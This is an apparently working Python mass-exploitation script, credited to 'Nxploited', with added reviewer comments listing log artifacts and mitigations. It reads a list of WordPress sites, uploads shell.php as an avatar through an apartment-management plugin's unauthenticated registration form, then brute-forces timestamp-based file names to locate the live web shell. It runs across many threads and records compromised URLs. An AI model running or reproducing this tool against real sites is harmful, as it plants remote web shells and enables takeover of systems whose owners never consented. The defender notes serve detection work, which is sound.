# NOTE(review): this listing was recovered from a whitespace-collapsed page.
# Line breaks and indentation are reconstructed from the syntax; the nesting
# of the retry loops in exploit_target() is inferred and should be confirmed
# against the original file. No code tokens were changed.
#
# What the script does, as far as the code below shows:
#   1. Reads a list of site base URLs and spreads them over worker threads.
#   2. For each site, submits a member-registration form with a local file
#      ("shell.php") attached as the avatar field "amgt_user_avatar".
#   3. Guesses the stored file name from the upload time and polls
#      /wp-content/uploads/apartment_assets/ until a response contains the
#      operator-chosen marker string.
#
# Artifacts a defender can look for in web and application logs (all taken
# from the constants and strings in this file):
#   - POST <site>/apartment-management-member-registration-page/ with a
#     multipart part named "amgt_user_avatar", filename "shell.php" and
#     content type application/octet-stream.
#   - Registration e-mail addresses of the form nxploited_<epoch>@poc.com.
#   - A burst of GET requests (up to NUM_RETRIES * (2 * TIMESTAMP_WINDOW + 1),
#     i.e. 88 with the defaults) for
#     /wp-content/uploads/apartment_assets/<epoch>-pimg-in.php with
#     neighbouring epoch values.
#   - The fixed User-Agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)".
# The success check requires that the uploaded file is stored with its .php
# extension and that the server returns the marker from that path; rejecting
# non-image avatar uploads server-side, or not executing scripts under
# wp-content/uploads/, removes those preconditions.

import threading
import requests
import time
import os
import urllib3
from rich.console import Console
from rich.panel import Panel
from rich.text import Text
from rich import box

# Silences the warning urllib3 emits for unverified HTTPS requests; the
# requests below are made with verify=VERIFY_SSL (False).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

console = Console()
# Sent on every request; constant, so usable as a log pivot.
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Local output files, appended to by write_result().
success_file = "success_results.txt"
uploaded_shells_file = "uploaded_shells.txt"
# Local file that is attached to the registration form.
shell_local_file = "shell.php"

INITIAL_SLEEP_AFTER_UPLOAD = 5
NUM_RETRIES = 8
SLEEP_BETWEEN_RETRIES = 4
VERIFY_SSL = False
TIMESTAMP_WINDOW = 5  # seconds window for timestamp guessing


def ascii_banner():
    """Print the tool banner and an author panel to the console."""
    # NOTE(review): the banner's whitespace was collapsed in the recovered
    # listing; the original line breaks are not recoverable, so the literal
    # is kept exactly as found.
    banner = r""" _____ ___ ___ ___ _______ ___ ______ __ ___________ _______ ________ (\" \|" \ |" \/" | | __ "\ |" | / " \ |" \(" _ ")/" "||" "\ |.\\ \ | \ \ / (. |__) :)|| | // ____ \ || |)__/ \\__/(: ______)(. ___ :) |: \. \\ | \\ \/ |: ____/ |: | / / ) :)|: | \\_ / \/ | |: \ ) || |. \ \. | /\. \ (| / \ |___(: (____/ // |. | |. | // ___)_ (| (___\ || | \ \ | / \ \ /|__/ \ ( \_|: \\ / /\ |\ \: | (: "||: :) \___|\____\)|___/\___|(_______) \_______)\"_____/ (__\_|_) \__| \_______)(________/ """
    console.print(Text(banner, style="bold cyan"))
    info_panel = Panel(
        Text(
            "Author: Nxploited (Khaled Alenazi)\n"
            "Telegram: @KNxploited\n"
            "GitHub: github.com/Nxploited",
            style="bold magenta"
        ),
        box=box.ROUNDED,
        style="cyan"
    )
    console.print(info_panel)


def generate_filename(original_filename: str, mark: str = "pimg", ts: int = None):
    """Build the guessed stored file name ``<ts>-<mark>-in.<ext>``.

    ``ts`` defaults to the current epoch second. ``ext`` is the text after the
    last dot of ``original_filename``, or empty when there is no dot (the
    result then ends in a bare ".").
    """
    # NOTE(review): presumably mirrors how the target stores the avatar; the
    # server-side naming code is not part of this file.
    if ts is None:
        ts = int(time.time())
    ext = original_filename.rsplit(".", 1)[1] if "." in original_filename else ""
    return f"{ts}-{mark}-in.{ext}"


def write_result(filename, value):
    """Append ``value`` followed by a newline to ``filename`` (UTF-8)."""
    with open(filename, "a", encoding="utf-8") as f:
        f.write(f"{value}\n")


def check_shell(shell_url):
    """GET ``shell_url`` and return ``(status_code, body_text)``.

    On any exception returns ``(None, str(exception))`` instead, so the caller
    sees a falsy status and the error text in place of the body.
    """
    try:
        r = requests.get(shell_url, headers={"User-Agent": user_agent}, timeout=15, verify=VERIFY_SSL)
        return r.status_code, r.text
    except Exception as e:
        return None, str(e)


def exploit_target(target_url, shell_marker):
    """Submit the registration form with the local file attached, then poll
    guessed upload URLs until one returns HTTP 200 with ``shell_marker`` in
    the body.

    Hits are appended to ``success_file`` and ``uploaded_shells_file``.
    Returns None in every case; progress is reported on the console only.
    """
    if not os.path.exists(shell_local_file):
        console.print(Panel(f"[ERROR] File '{shell_local_file}' not found.", style="bold red"))
        return

    # Captured before the request is sent; it is the centre of the guessing
    # window and also makes the registration e-mail unique per attempt.
    upload_ts = int(time.time())
    email = f"nxploited_{upload_ts}@poc.com"
    # The file goes in the avatar field with a generic binary content type.
    files = {
        "amgt_user_avatar": (shell_local_file, open(shell_local_file, "rb"), "application/octet-stream")
    }
    # Static registration form values; only the e-mail varies between runs.
    data = {
        "building_id": "1",
        "unit_cat_id": "2",
        "unit_name": "Unit A",
        "member_type": "Owner",
        "first_name": "Nx",
        "last_name": "Ploited",
        "gender": "male",
        "birth_date": "1996-01-01",
        "mobile": "1122334455",
        "email": email,
        "password": "Nx123456!",
        "registration_front_member": "1"
    }
    upload_url = target_url.rstrip("/") + "/apartment-management-member-registration-page/"
    console.print(Panel(f"[EXPLOIT] Uploading shell to:\n{upload_url}", style="bold yellow"))
    try:
        # No cookies, session or credentials are attached to this request.
        # The response is discarded, so the "uploaded" message below only
        # means that no exception was raised, not that the server accepted
        # the file.
        requests.post(upload_url, data=data, files=files, headers={"User-Agent": user_agent}, verify=VERIFY_SSL)
        files["amgt_user_avatar"][1].close()
        console.print(Panel("[✓] Shell uploaded, searching for shell location...", style="bold green"))
    except:
        try:
            files["amgt_user_avatar"][1].close()
        except:
            pass
        console.print(Panel("[!] Shell upload failed", style="bold red"))
        return

    time.sleep(INITIAL_SLEEP_AFTER_UPLOAD)
    console.print(Panel(f"⏳ Brute-forcing timestamp window: {upload_ts-TIMESTAMP_WINDOW} to {upload_ts+TIMESTAMP_WINDOW} (window={TIMESTAMP_WINDOW})", style="bold cyan"))

    found = False
    # Each attempt shifts the whole window forward by one second, so the
    # values actually requested run past the range printed above.
    for attempt in range(NUM_RETRIES):
        for delta in range(-TIMESTAMP_WINDOW, TIMESTAMP_WINDOW + 1):
            guessed_ts = upload_ts + delta + attempt
            shell_name = generate_filename(shell_local_file, ts=guessed_ts)
            shell_url = f"{target_url.rstrip('/')}/wp-content/uploads/apartment_assets/{shell_name}"
            status, body = check_shell(shell_url)
            # A hit needs both HTTP 200 and the marker in the response body.
            if status == 200 and shell_marker in body:
                console.print(Panel(f"[✓] LIVE SHELL WORKING!\n{shell_url}", style="bold green"))
                write_result(success_file, f"{target_url} | {shell_url}")
                write_result(uploaded_shells_file, shell_url)
                found = True
                break
            elif status == 200:
                console.print(Text(f"[200] {shell_url} (shell marker not found)", style="bold yellow"))
            elif status:
                console.print(Text(f"[{status}] {shell_url}", style="bold red"))
            else:
                # status is None: check_shell() caught an exception.
                console.print(Text(f"[FAIL] No response from server: {shell_url}", style="bold red"))
        if found:
            break
        time.sleep(SLEEP_BETWEEN_RETRIES)

    if not found:
        console.print(Panel(f"[✗] Shell not accessible or not found:\n{target_url}", style="bold red"))


def split_list(lst, num):
    """Split ``lst`` round-robin into ``num`` lists (item i goes to list
    ``i % num``); some lists are empty when ``len(lst) < num``."""
    return [lst[i::num] for i in range(num)]


def thread_worker(targets, shell_marker):
    """Run exploit_target() sequentially for each URL in ``targets``."""
    for target_url in targets:
        exploit_target(target_url, shell_marker)


def main():
    """Prompt for the targets file, thread count and marker, then process the
    targets on one thread per chunk and wait for all of them."""
    ascii_banner()
    list_file = console.input("[yellow]Enter targets file name (e.g., list.txt): [/]").strip()
    threads_count = console.input("[yellow]Enter number of threads (default 10): [/]").strip()
    shell_marker = console.input("[yellow]Enter shell marker to search for (default: Nxploited): [/]").strip()
    if not shell_marker:
        shell_marker = "Nxploited"  # Default
    # Anything that is not a positive integer falls back to 10 threads.
    if not threads_count.isdigit() or int(threads_count) < 1:
        threads_count = 10
    else:
        threads_count = int(threads_count)
    # One base URL per line; blank lines are skipped.
    with open(list_file, "r", encoding="utf-8") as f:
        targets = [line.strip() for line in f if line.strip()]
    split_targets = split_list(targets, threads_count)
    thread_list = []
    for chunk in split_targets:
        th = threading.Thread(target=thread_worker, args=(chunk, shell_marker))
        th.daemon = True
        th.start()
        thread_list.append(th)
    for th in thread_list:
        th.join()
    console.print(Panel("Done! Results in success_results.txt & uploaded_shells.txt.", style="bold green"))


if __name__ == "__main__":
    main()